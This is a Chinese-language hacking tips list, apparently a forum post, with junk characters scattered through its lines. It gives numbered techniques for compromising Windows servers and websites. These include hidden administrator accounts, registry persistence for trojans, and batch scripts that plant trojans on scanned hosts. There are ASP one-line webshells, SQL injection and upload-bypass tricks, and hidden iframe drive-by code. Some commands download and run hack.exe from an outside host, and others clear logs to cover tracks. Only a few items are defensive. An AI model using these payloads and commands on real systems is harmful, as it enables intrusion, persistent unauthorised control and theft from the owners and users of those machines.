Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
1 Y& V! \$ X. }9 @0 t$ gcacls C:\windows\system32 /G hqw20:R
2 r- D6 P1 R4 ~9 K, y- i1 d思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入2 G; Z4 u9 x. C+ F/ N6 Z8 B, ~
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
# a6 q3 y: F; J3 L6 S; r& I* m ?! n1 o8 x! I
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。9 f$ ]& ^3 W* @) f
7 Q, g- u0 U. y# ]0 `4 N
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
2 y: d' w3 @% R* c
& E2 V/ F8 S; @* K4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
* F+ l. d/ J. g" ]6 w
! @8 T: l' O# E1 R& e" L5、利用INF文件来修改注册表! I0 N% a; I8 J3 Y$ s
[Version], a3 ~% R6 ^! {- a7 u- u3 ^' a! ]
Signature="$CHICAGO$"8 W @! }: I/ I
[Defaultinstall]. B' \7 f; ]" s" }" f; ~, O
addREG=Ating
2 F; e4 {9 K6 N5 Y+ h w[Ating]
4 v/ }4 ^! ]9 V7 y6 kHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
) V! k& C/ U6 G3 \+ f以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:3 {5 V$ d3 f! ] W6 E
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径7 z( y3 @+ k# p( w: y
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
% E0 d9 \; U1 P0 H- o( D/ EHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU7 H$ J Y& o% c0 e4 x% F }0 a+ u
HKEY_CURRENT_CONFIG 简写为 HKCC% D5 m: A5 D8 i) r9 C2 f
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值1 |5 o3 P# r( w, K
"1"这里代表是写入或删除注册表键值中的具体数据) |+ h+ A; T4 k' E# s
; I9 I J0 I& R6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
* @* c: K' u+ c7 C9 Y多了一步就是在防火墙里添加个端口,然后导出其键值5 j8 [" j5 l* g: a, [2 R
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
1 h0 w# t, w9 z8 `5 F5 P: q# r; z
: [5 X+ N5 ~$ {$ r. \3 l" n: f7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
% G) K8 w9 T/ k, P! m% c在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
& x* L, j4 f/ q! M4 r2 P. b5 R8 X4 [( x. P1 m( W
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
6 r) h0 P1 ?; V, Y z+ i4 f( H; ~2 B% Z- j( Z
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
3 X! }2 ^' }' {$ [9 b6 M可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
& d5 K( e0 d: W) [& L. e7 _; k1 N7 X* k; E
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login” X: M% a O8 j+ P
5 V( f! E# \. {7 L' S9 s6 M0 [
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
% Q! @8 e u9 n用法:xsniff –pass –hide –log pass.txt: Z- `6 t( c; g+ D: V J/ ?2 ~" D" E
# r" s- \9 N+ }1 J/ I; |. |& c
12、google搜索的艺术
9 E+ O, I3 U4 {8 P搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”- |( v2 i/ w# {0 U
或“字符串的语法错误”可以找到很多sql注入漏洞。7 m; d3 S( a. f, C( N) s
, v, D- M/ b% d13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
5 J) `( N! r. @% i% Y p% h2 @
+ s: W6 l9 L/ v9 |# b, `9 M14、cmd中输入 nc –vv –l –p 1987
! u. ]" l8 [! g做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
; f# w$ I1 c+ b2 {
" E% A5 R* g$ P3 H4 s, W) ~15、制作T++木马,先写个ating.hta文件,内容为5 T' J1 B5 s1 D" f
<script language="VBScript">0 `7 @) v8 \; u( w) P
set wshshell=createobject ("wscript.shell" )
# e* }& V3 y" `4 W1 X0 q! Ta=wshshell.run("你马的名称",1)
1 ^4 i4 R) `/ h1 J; w) kwindow.close' X7 b8 J7 l3 s+ r
</script>% I) a' r- j) x9 K* D
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。- j5 M, V9 a: c4 v; [
/ _( U$ c$ A( w) Z1 | K16、搜索栏里输入 N, Y! V3 O& I
关键字%'and 1=1 and '%'='
' ~/ p1 a/ r/ S- f关键字%'and 1=2 and '%'='
. o% Z. s; u% |: D6 p比较不同处 可以作为注入的特征字符: ]1 K# s2 Y8 O+ P" c% u q
( `- c& b* l9 c0 j, t& L- T- l17、挂马代码<html>
" A7 L8 E$ T8 P<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
' [2 V0 L; ?; A3 ?; T( n</html>! r& i8 {7 c5 _3 U
F6 C4 H- t% D9 {* Q7 K- i18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,: H b7 D+ v4 e' Z
net localgroup administrators还是可以看出Guest是管理员来。
0 D3 _ l8 A% z* V3 m, @) _# j7 u' P; P. ?1 m! q) ?/ g4 T4 h/ B/ f
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
2 V4 S& v4 R R" e9 ~/ E, e5 [3 t用法: 安装: instsrv.exe 服务名称 路径& P* a, {9 V& p4 U
卸载: instsrv.exe 服务名称 REMOVE/ M0 j# s. i9 s% S+ K* p
( `' {' K$ R" _
) Y3 a; U$ m. e! C1 S8 G21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉, L ]& F$ A* o$ M+ \9 G7 x
不能注入时要第一时间想到%5c暴库。
1 p4 D$ F: ]/ K- e- m; `9 S. R& Q. O. Q3 J& S
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~/ L/ p4 Y. ^5 |% J9 @) F
9 e% `/ X* z7 |( ]0 Z5 ]23、缺少xp_cmdshell时' {4 ~: a; C% W5 ]
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
( ], Q) @$ @* W8 s# Z# \' _假如恢复不成功,可以尝试直接加用户(针对开3389的)
8 d: v9 o% _; S" A" ndeclare @o int( \) ^$ z/ d% C0 B( n
exec sp_oacreate 'wscript.shell',@o out
" S7 Q7 i5 i$ b9 s j; Q1 Lexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员 ?, J8 Y$ d" d6 p% r4 v
4 W4 D5 _" {2 o- d
24.批量种植木马.bat
: A' U+ Z+ y Ufor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中6 t& ]9 R$ P, W$ h
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间0 ?( E- M; \% G+ F7 Y" p4 G) F- o
扫描地址.txt里每个主机名一行 用\\开头, R; T/ }( c% }
( L% G! @* i& @8 Z; ~25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
- A2 ?0 A9 s; o8 Z4 l& G
* o# t9 c9 ]: U- W# C26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
% X3 L0 G4 U3 W3 H1 f6 F3 A将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.* |5 V8 }' F( h/ k
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马1 T' R$ D( {7 [* \( N! y4 N
" R- X0 e% [+ @, w7 |2 w% t9 _27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP% }+ ~% i6 r( l. N% a- ?$ Y5 j
然后用#clear logg和#clear line vty *删除日志
( a5 U5 c2 m# D( A
; L9 S% L5 F6 {& t7 B: G28、电脑坏了省去重新安装系统的方法
! d1 W/ L) a4 d @/ v, B1 V纯dos下执行,9 [- V$ x9 p a3 W! |8 w
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config' X* g# W0 f- p
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config$ x" Z0 w( x1 h0 r5 o! I$ v% l5 A
4 R) y$ D6 y6 w
29、解决TCP/IP筛选 在注册表里有三处,分别是:
0 H3 v$ s5 J: m9 XHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
r D6 g) b# `+ J; S! R* { t! }HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
. Q% A3 W& o+ \7 l+ } Y3 o- cHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
$ A ?. n- ~ M$ c分别用* h( z8 o4 @! P7 r+ r
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
9 Q+ E' B% O$ S/ X1 Z9 _2 ]regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip6 N c, r1 M4 f) j* ?
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" x' j: J, V, O
命令来导出注册表项
& ~' Z1 |" O8 [5 v3 c' j* G然后把三个文件里的EnableSecurityFilters"=dword:00000001,
: H5 ?( |/ ?/ c0 [) N改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用( g( {4 _! v* l/ J& O, k
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
4 A( L3 S- g. o" \7 @
6 M. B, E3 N3 [+ }30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
/ @- o, W V- tSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
# ?' h3 ^: O+ T8 g, V' Q9 R3 L4 N0 Y$ v: m @4 v2 \
31、全手工打造开3389工具) g) x* u; t$ V1 d$ ^/ Z
打开记事本,编辑内容如下:
0 B2 d$ y9 r. F) Kecho [Components] > c:\sql
9 K7 {+ ]9 }; M: pecho TSEnable = on >> c:\sql' s* S: u5 D2 n1 A7 i! }
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q7 T# I1 [ V: R( J
编辑好后存为BAT文件,上传至肉鸡,执行
% S0 s( d7 o9 e! I! Y1 A$ C9 `) @# e
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马2 u& t. e, m% E. L* F
4 g. k( |. j6 b& w) m4 {33、让服务器重启
; \# U5 g' F; u- f; B8 X+ M写个bat死循环:
: t7 R/ k* T- M9 X; }% h@echo off- \: N5 p* K" |4 ~& `
:loop1
, z7 K4 T7 K5 _# g$ c6 Jcls4 \( Z0 y. _$ w( X4 h* h+ i
start cmd.exe" A8 i. I, G( M: E
goto loop1
F$ O$ E/ B; z5 q. _保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
4 y3 D* X! y* z& ~
* d2 \" H. X, z" N34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,: C: D: h2 P( W) o: M
@echo off! Y3 a" S1 }* l% b
date /t >c:/3389.txt0 P) l% i6 m# A& } ~
time /t >>c:/3389.txt
8 j2 i! I" g. B5 j- g% z! O& yattrib +s +h c:/3389.bat
+ a1 `: K. ^+ l! q5 ^attrib +s +h c:/3389.txt
6 e- b) [/ D0 d q8 `netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
/ f6 D6 _$ I& f5 _9 w0 k: d& O并保存为3389.bat9 A4 o7 o, Q( n: l
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号, ?* b4 O! \ m& _4 t, j
+ ^% l4 `- |: q; k3 b: P2 T35、有时候提不了权限的话,试试这个命令,在命令行里输入:
1 h0 G1 g9 B) U0 nstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)2 Y8 }2 L. v+ |- M r1 ?
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。- D0 w: z% `3 e3 I X
0 H2 F, s: z- E$ [2 w, d36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件 J0 R- r& X) z% t. e! p7 u
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
3 ]( Q2 d! c3 s# O8 a3 iecho 你的FTP账号 >>c:\1.bat //输入账号' `3 p$ p1 k% A) E6 z& z/ p4 d' O
echo 你的FTP密码 >>c:\1.bat //输入密码
! m. Z! `2 E% ^" Q# }8 X8 ? c9 I/ Hecho bin >>c:\1.bat //登入5 y$ a' A0 ]* m6 ]" m" _
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
: l/ m8 i0 L& o. l r5 @echo bye >>c:\1.bat //退出( G& { r$ S: F) K
然后执行ftp -s:c:\1.bat即可8 @( s$ m L% g1 j$ s+ y
. l: a" l# y/ a( _5 J7 u' ^4 t( p) D
37、修改注册表开3389两法
/ P3 p6 _+ V2 G. A5 w3 A$ M# t' }6 Q5 O(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
- v; s- y# o: B* Z. N. d4 Iecho Windows Registry Editor Version 5.00 >>3389.reg" |& I; U: t3 i3 v9 v/ O
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg. g% [6 ?; C6 [9 P* ^6 A
echo "Enabled"="0" >>3389.reg
h4 c7 ]& v+ K3 s: Y/ yecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows6 p3 |. t3 d+ p, F2 X2 b9 ?
NT\CurrentVersion\Winlogon] >>3389.reg
k* {7 b+ Y7 B' z9 }echo "ShutdownWithoutLogon"="0" >>3389.reg4 g2 z/ R; a& E! H q+ J- H! S- L
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
! Z+ Q* G" R S, f>>3389.reg
2 X+ ^4 v, w( T/ Uecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
, ?+ G3 F9 C( d4 A* ^3 ~echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]" j+ r% X6 P ]' h y" s
>>3389.reg
& i# e! f- g! p' p0 E2 j* L5 Decho "TSEnabled"=dword:00000001 >>3389.reg
* R: x7 M6 \! Kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
1 {+ i& N( x E. B6 cecho "Start"=dword:00000002 >>3389.reg
+ ?0 f! @ Z! g: Mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
' B; l4 s( ]$ K" d9 B>>3389.reg4 W( u5 P }; \( g: M. N
echo "Start"=dword:00000002 >>3389.reg
/ }% c6 N; w: {: necho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg" S: x4 ?, \ i
echo "Hotkey"="1" >>3389.reg8 _4 B' a3 V3 Z( A/ l' K% F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal& ] {3 {2 g) ]
Server\Wds\rdpwd\Tds\tcp] >>3389.reg; `4 w$ D3 D- ?3 O* M: c
echo "PortNumber"=dword:00000D3D >>3389.reg
, ?6 t- `3 _* w5 W' J' pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* ~8 p8 }+ d* E$ { }8 t: {
Server\WinStations\RDP-Tcp] >>3389.reg
8 k' X. S4 Q+ x2 N. }echo "PortNumber"=dword:00000D3D >>3389.reg: ]- X, B( B* J% m& V: P
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。( B& S0 o7 `1 Y) f
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
6 `& F& j; s$ R) L2 }因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
' p# }5 A; ]5 Z& X(2)winxp和win2003终端开启
. r0 x3 [4 D6 ?+ Z9 {" j用以下ECHO代码写一个REG文件:7 k: F' @ d; I/ |
echo Windows Registry Editor Version 5.00>>3389.reg: \0 Q R+ d8 P P0 G3 P4 J. l
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal+ A4 A: `' I( Z8 l- S) e& `+ w
Server]>>3389.reg
, V! m( ?8 r+ L% `1 F4 D' g4 gecho "fDenyTSConnections"=dword:00000000>>3389.reg
' ]3 X. I' D! F8 [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
0 ^' U4 d4 |1 U0 FServer\Wds\rdpwd\Tds\tcp]>>3389.reg
; P3 v; ]- E2 Z( Q2 G8 Hecho "PortNumber"=dword:00000d3d>>3389.reg; {3 ?( [. p8 G8 }% g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal( B# X" M( I* H3 G
Server\WinStations\RDP-Tcp]>>3389.reg, F3 c( [' A) Q$ T7 _% }
echo "PortNumber"=dword:00000d3d>>3389.reg a- r/ q! I2 g0 y
然后regedit /s 3389.reg del 3389.reg
6 ?8 i: L. P4 p+ d' z% pXP下不论开终端还是改终端端口都不需重启
9 [& z: g8 M- P* X( x
& O' O u" r k, W: G w38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃; g2 O1 x& C' G3 x
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'* f. }: U% P" T7 R/ m$ P
: \7 Y& v8 K( {9 k0 _; r1 j39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!& c" L/ `' A8 Y, F. x C
(1)数据库文件名应复杂并要有特殊字符
; O# F8 I$ U* U/ n(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
- [2 D$ T P; s: K4 A将conn.asp文档中的! L1 w& y; E I9 j; O3 r- |0 a# S
DBPath = Server.MapPath("数据库.mdb")
$ F3 ?7 y7 X( J$ @, o' dconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
: O# K+ s4 w) k. ^& p4 K0 G7 a- B j# l9 S$ e2 Y7 _# g, ^& M1 C* @' B+ d
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
8 M; T: p/ r3 P9 x6 P1 g+ o1 @(3)不放在WEB目录里: g/ B9 N0 N6 a6 H9 B* \8 Y
8 ]7 M" Q- _5 B
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉/ ~4 N, Y6 w/ Y' s( {# W
可以写两个bat文件/ [8 k2 J) ^2 S g L* ~1 ?! u
@echo off, b3 t/ F8 b& T u
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
3 Z0 }% |; v/ ?. V3 \' O, M@del c:\winnt\system32\query.exe$ t4 R* P9 R( K, _
@del %SYSTEMROOT%\system32\dllcache\query.exe
. X! z3 q Z8 T( W/ ^2 T" G' }@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的! X. m7 H( t/ x& I
; C3 ]8 u/ E8 Z2 |7 i6 u. d3 _9 n5 X@echo off' ~! K9 Q- c/ r% i1 m$ A9 x0 A3 ]
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe4 k* ^7 s) z$ R7 h/ [1 k- e8 b- b3 i# P
@del c:\winnt\system32\tsadmin.exe' o3 q9 S1 ^5 \+ o; P
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex$ c- ~: L3 t3 `1 c& d
4 ^6 Z0 \. \" _$ ?, C3 _( x
41、映射对方盘符
1 f3 _% f- E0 b1 Z% Ptelnet到他的机器上, S6 X! o( S O
net share 查看有没有默认共享 如果没有,那么就接着运行% z3 z- {( z3 H) \ t# e
net share c$=c:
' i* W( o2 X0 Y" anet share现在有c$
# k/ g8 z4 I: k% F/ T在自己的机器上运行
" m" h' b; e) k% J3 `" [net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K* l" [# m9 N/ u
' H! P/ l- y3 B6 ]: `5 d42、一些很有用的老知识/ a1 j0 Z- T2 A, S& b: b8 }
type c:\boot.ini ( 查看系统版本 )8 c y6 ]5 D* J# i2 f! U
net start (查看已经启动的服务)
. O% ^0 B& Z, W8 r/ T% P9 `query user ( 查看当前终端连接 )/ F9 s, k3 e6 V" o% E
net user ( 查看当前用户 )9 f6 v1 ^2 N# ]4 v
net user 用户 密码/add ( 建立账号 )% ~! p/ U! C: E! V% O
net localgroup administrators 用户 /add (提升某用户为管理员)
5 ^; y+ \' U0 m2 Lipconfig -all ( 查看IP什么的 )( G2 Y/ s5 k* v8 f+ D
netstat -an ( 查看当前网络状态 )
0 c2 Z$ h% k Afindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)) ^6 g; O3 Z# f+ | r" o
克隆时Administrator对应1F41 r- J v8 R, B) ]
guest对应1F5: g% F6 C& }* L2 g/ m
tsinternetuser对应3E8# t \* R$ P7 J" [+ j4 _* w; X( c
9 z. |* r8 |- M% z- }! j& I* [& j43、如果对方没开3389,但是装了Remote Administrator Service4 X, ?" r" e! {, p9 G
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
5 V4 z2 v5 [8 A解释:用serv-u漏洞导入自己配制好的radmin的注册表信息* G( d3 t0 X6 E3 v
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
' y6 _# Z1 h# L; `- t( Q7 {4 k9 r4 @8 C" }* z* |/ ^9 |' J
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
. h. f/ D I/ |% G0 b本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
' X6 e: ^% M/ n1 S
, P/ ?; { S% ?# n, Y5 K45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)4 M/ L1 q- [7 w* A6 R6 Z4 b
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
3 j9 t" h3 o9 f) S! j9 V5 V: R- k* U^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
$ t* N s( v5 TCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
9 p9 n- M6 h/ T9 N: p/ Y. l" K1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs9 F0 w: a `% Z! @# ?
(这是完整的一句话,其中没有换行符); R5 N# {& c/ j! M, U
然后下载:
2 n5 B& H# u0 _5 [ @cscript down.vbs http://www.hack520.org/hack.exe hack.exe& P: Y. C7 i4 p
: J8 l5 n& q9 @
46、一句话木马成功依赖于两个条件:
( `: L/ ] e+ s) q* o! a1、服务端没有禁止adodb.Stream或FSO组件
/ T4 I# T$ D; c( U( z6 r' p0 A, X/ B2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。 @% o9 i6 C- I/ f+ R/ Z
* T4 n4 j! _% V1 A
47、利用DB_OWNER权限进行手工备份一句话木马的代码:% t0 x& g8 ?- }- G
;alter database utsz set RECOVERY FULL--$ X& c) F+ Q0 _- {6 ~2 \1 n
;create table cmd (a image)--, T j3 i) e2 p# a2 Y* x2 Y& N
;backup log utsz to disk = 'D:\cmd' with init--
4 D, b6 @4 o! H8 l% {) @4 C/ R;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--! m2 E, e8 s L8 U# X
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--: z& X1 y( L; j5 E& n
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。. K0 W0 G$ l- C' t) x5 M3 W; y
, F) R3 {( k' U48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:! O: F4 i- |! B/ W/ D- y) O* i
z+ v# W& l9 e/ h$ A. Q, Q+ ]用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
* H" O- g7 q" l所有会话用 'all'。
( T4 b9 b8 x6 _& O) r! |( E-s sessionid 列出会话的信息。+ {0 m' R& T, v' @( X g
-k sessionid 终止会话。
+ I" C P( x0 f0 s9 L-m sessionid 发送消息到会话。
, K) g6 y2 \4 r; _& q* \5 e; m/ k- ?4 V- y
config 配置 telnet 服务器参数。& O8 x( ^0 @# g5 Q1 M
: I' F, q: o2 }' d$ F* o! J9 z
common_options 为:1 L5 q, [: A5 J7 C+ R
-u user 指定要使用其凭据的用户! ]7 i4 e: S" R. n# N" ?* p
-p password 用户密码5 P: Y3 _; W8 s7 Z, u
i' Y7 P% r" ~! ?9 A+ w/ k0 J
config_options 为:
/ S7 _6 C6 G( M3 l) k* S; \2 F5 P4 Cdom = domain 设定用户的默认域
; y* r1 \( N% S% s# @ctrlakeymap = yes|no 设定 ALT 键的映射
a0 E J- T% r( J# P. p: f' Ttimeout = hh:mm:ss 设定空闲会话超时值
: _ I+ E5 _* V4 z, qtimeoutactive = yes|no 启用空闲会话。
# O N# W6 _, _: Tmaxfail = attempts 设定断开前失败的登录企图数。
9 h- e, V! Z. R0 i' gmaxconn = connections 设定最大连接数。
" ~* ?: X7 E8 Qport = number 设定 telnet 端口。4 I) J/ ]5 w: e2 a7 p& J* }
sec = [+/-]NTLM [+/-]passwd7 |9 C A, d7 S2 B4 {4 R
设定身份验证机构
: p3 L, ]7 k# u% M. b" @ ^fname = file 指定审计文件名。
3 p2 r+ f [1 [& a8 [7 ?+ Hfsize = size 指定审计文件的最大尺寸(MB)。2 }, h# y+ U2 E8 D
mode = console|stream 指定操作模式。& R# m7 j9 U: W% x1 O; Q$ p: j
auditlocation = eventlog|file|both0 A8 `' P- \' D+ O5 Y; w
指定记录地点
/ j9 r; h, I6 saudit = [+/-]user [+/-]fail [+/-]admin
9 X! k* L a. k6 n) U; d, |7 s, _/ `4 T: |9 I
49、例如:在IE上访问:
; j( | m4 _2 A! y5 h, ?/ @www.hack520.org/hack.txt就会跳转到http://www.hack520.org/4 B& p( |$ q6 v# O) }
hack.txt里面的代码是:
X# D+ R1 a3 v* \<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">+ E7 Z1 w n6 q0 v" J5 i o8 k
把这个hack.txt发到你空间就可以了!9 [+ {& E9 n; [" |/ E: n0 R
这个可以利用来做网马哦!+ p( l9 g. ~: L3 V c+ x: c
; f9 [2 b! q7 K1 b Y P4 `50、autorun的病毒可以通过手动限制!/ P( \0 x; l- x K
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
. v7 h- _2 o7 k9 ^6 p2,打开盘符用右键打开!切忌双击盘符~0 a( I5 b7 m. Y
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
) N5 P9 L% Q i8 }1 D7 [4 E B) y J; x
51、log备份时的一句话木马:& E" V2 q5 g3 g8 l( l6 A
a).<%%25Execute(request("go"))%%25># @, v6 i* d4 {! f
b).<%Execute(request("go"))%>
9 n! ]8 Q8 D8 h7 G/ hc).%><%execute request("go")%><%4 y0 m& Z; Z6 m
d).<script language=VBScript runat=server>execute request("sb")</Script>( ^0 p. y9 s# }) }* t5 \9 t: H! [1 o
e).<%25Execute(request("l"))%25>/ |1 X ^ K+ T$ C7 F7 r
f).<%if request("cmd")<>"" then execute request("pass")%>
& K1 P6 }/ {9 T9 O/ i7 W, F; c+ l% J# |6 O
52、at "12:17" /interactive cmd
; \5 l+ |, `( F# _执行后可以用AT命令查看新加的任务
9 e3 W* Y. z H, a8 }用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。) H8 q2 B* z( }( ?* y
4 }2 G/ s* g) z7 y+ o; V% I
53、隐藏ASP后门的两种方法& b( a: W: X( n9 {: T( H: j
